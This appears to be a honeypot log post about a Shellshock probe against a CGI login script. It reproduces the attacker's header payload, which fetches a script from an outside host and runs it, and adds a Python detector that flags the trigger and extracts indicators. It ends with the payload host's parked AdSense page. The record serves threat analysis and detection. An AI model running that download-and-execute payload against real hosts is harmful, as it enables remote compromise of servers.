Sunday, 29 November 2015

31.16.134.211 - Shellshock via http://qupn.byethost5.com

BEGIN OF HTTP DATA:
2015-11-28 17:55:32
Source IP: 31.16.134.211
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://qupn.byethost5.com/gH/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1
 -t500
 END OF DATA
At the time of my analysis the accessible site only showed an HTML page related to Google AdSense.
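The request above is the classic Shellshock shape: a header value beginning with a bash function definition (`() { :; };`) followed by the commands a vulnerable CGI host would run when bash imports the HTTP_* environment variables. As an added example (not part of the original post), the following Python detector parses raw HTTP requests, flags any header whose value starts with that trigger, and pulls out the command chain and download URLs as indicators for triage. The captured request is reassembled from the data shown above; the benign request and all function names are constructed here for illustration.

```python
import re
from dataclasses import dataclass, field

# Constructed sample input: the honeypot capture from this post, reassembled as a
# raw HTTP request, plus a benign request for contrast.
CAPTURED_REQUEST = (
    "GET /cgi-bin/authLogin.cgi HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "User-Agent: () { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../ "
    "&& /usr/bin/wget -c http://qupn.byethost5.com/gH/S0.sh -P /tmp "
    "&& /bin/sh /tmp/S0.sh 0<&1 2>&1\r\n"
    "\r\n"
)
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/42.0\r\n"
    "\r\n"
)

# Shellshock trigger: a bash function definition "() {" at the very start of a
# variable value. CGI servers export every request header as an HTTP_* environment
# variable, so any header (not only User-Agent) can carry it. Whitespace between
# the tokens is allowed, which is why the pattern tolerates it.
SHELLSHOCK_RE = re.compile(r"^\s*\(\s*\)\s*\{")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


@dataclass
class Finding:
    header: str                      # header that carried the trigger
    value: str                       # full header value, for the incident record
    urls: list = field(default_factory=list)      # download locations (IoCs)
    commands: list = field(default_factory=list)  # command chain after the trigger


def parse_headers(raw):
    """Split a raw HTTP request into (request_line, {header_name: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip()] = value.strip()
    return lines[0], headers


def detect_shellshock(raw):
    """Return one Finding per header whose value starts with a Shellshock trigger."""
    _, headers = parse_headers(raw)
    findings = []
    for name, value in headers.items():
        if not SHELLSHOCK_RE.match(value):
            continue
        # Everything after the closing "};" is what a vulnerable bash would execute.
        body = value.split("}", 1)[1].lstrip(";").strip()
        # Split the chain on shell list operators to get one command per entry.
        commands = [c.strip() for c in re.split(r"&&|\|\||;", body) if c.strip()]
        findings.append(Finding(name, value, URL_RE.findall(value), commands))
    return findings


if __name__ == "__main__":
    for req in (CAPTURED_REQUEST, BENIGN_REQUEST):
        request_line, _ = parse_headers(req)
        hits = detect_shellshock(req)
        print(request_line, "->", "SHELLSHOCK" if hits else "clean")
        for hit in hits:
            print("  header:  ", hit.header)
            print("  urls:    ", hit.urls)
            print("  commands:", hit.commands)
```

Matching on the leading `() {` rather than on specific commands keeps the rule independent of the payload, so the same check would have caught this request had the attacker changed the download host or the script name; the extracted URL and command list are what you would hand to blocklisting and to whoever pulls the second stage for analysis.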

31.16.134[.]211

    Static Source: GeoIP data
  • Country: Germany
  • ASN: AS31334 Kabel Deutschland Vertrieb und Service GmbH
    Dynamic Source: SANS Internet Storm Center
  • Comment: IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/31.16.134.211

Page:
<!DOCTYPE html>
<!--[if IE 8 ]><html class="ie8"><![endif]--><!--[if IE 9 ]><html class="ie9"><![endif]--><!--[if (gt IE 9)|!(IE)]><!--><html><!--<![endif]-->
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <title></title>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <noscript><meta HTTP-EQUIV="REFRESH" content="0; url=/legacy"></noscript>
  <script src="//www.google.com/adsense/domains/caf.js" type="text/javascript"></script>
</head>
<body>
<script type="text/javascript">et=(function(){var
eD=window.location,eH={},dG,ej=eD.search.substring(1),eF,eG;if(!ej)
return eH;eF=ej.split("&");for(dG=0;dG<eF.length;dG++){eG=eF[dG].split('=');eH[eG[0]]=eG[1]?eG[1]:"";}
return eH;})();(function(){var
eD=window.location,X=document,cC=undefined,bd=encodeURIComponent,dA=X.getElementsByTagName('body')[0],eE;if(top.location!=eD)
top.location.href=eD.href;eE=X.createElement('script');eE.type='text/javascript';eE.src='/glp'+'?r='+(et.r?et.r:(X.referrer?bd(X.referrer.substr(0,255)):''))+'&u='+bd(eD.href.split('?')[0])+
(et.gc?'&gc='+et.gc:'')+
(et.cid?'&cid='+et.cid:'')+
(et.query?'&sq='+et.query:'')+
(et.a!==cC?'&a':'')+
(et.z!==cC?'&z':'')+
(et.z_ds!==cC?'&z_ds':'');dA.appendChild(eE);if(!window['googleNDT_'])
eD.replace('/legacy');})();</script>
</body>
</html>